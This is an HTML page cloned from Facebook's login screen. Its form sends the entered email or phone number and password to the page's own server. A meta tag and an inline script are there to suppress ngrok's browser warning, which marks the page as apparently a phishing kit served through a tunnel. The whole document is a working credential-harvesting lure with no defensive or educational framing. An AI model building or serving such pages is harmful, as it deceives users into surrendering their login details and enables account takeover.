<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="ngrok-skip-browser-warning" content="true" />
    <title>Facebook - log in or sign up</title>
    <link
      rel="shortcut icon"
      href="/static/logo/facebook-favicon.svg"
      type="image/x-icon"
    />
    <link
      href="/static/bootstrap/css/bootstrap.css"
      rel="stylesheet"
    />

    <link rel="stylesheet" href="/static/style.css" />
  </head>
  <body>
    <div class="container-fluid">
      <h1 class="heading-name text-center">facebook</h1>
      <div class="row">
        <div class="col-md-4"></div>
        <div class="col-md-4">
          <p class="txt-para">
            Facebook helps you connect and <br />share with the people in your
            life.
          </p>
        </div>
        <div class="col-md-4"></div>
      </div>
    </div>

    <div class="container-fluid">
      <div class=""></div>
      <div class="container-fluid form-of">
        <form action="/" method="POST" class="face-form">
          <div class="mb-3">
            <input
              type="text"
              name="phoneNumber"
              class="form-control input-form-sec"
              id="exampleInputEmail1"
              placeholder="Email address or phone Number"
              aria-describedby="emailHelp"
            />
          </div>
          <div class="mb-3">
            <input
              type="password"
              name="passwd"
              class="form-control input-form-sec"
              id="exampleInputPassword1"
              placeholder="Password"
            />
          </div>
          <button type="submit" class="btn face-btn">Log in</button>
          <p class="text-center text-primary text-btn">Forgotten password?</p>
          <hr />
          <a type="button" class="btn face-btn-green text-center">Sign Up</a>
        </form>
      </div>
      <div class="text-center">
        <p class="text-center foot">
          <a class="foot-link" href="#">Create a Page</a> for a celebrity, brand
          or business.
        </p>
      </div>
    </div>
    <script
      src="/static/bootstrap/js/bootstrap.js"
    ></script>
    <script>
      // Bỏ qua cảnh báo ngrok
      if (window.location.hostname.includes('ngrok')) {
        fetch(window.location.href, {
          headers: {
            'ngrok-skip-browser-warning': 'true'
          }
        });
      }
    </script>
  </body>
</html>
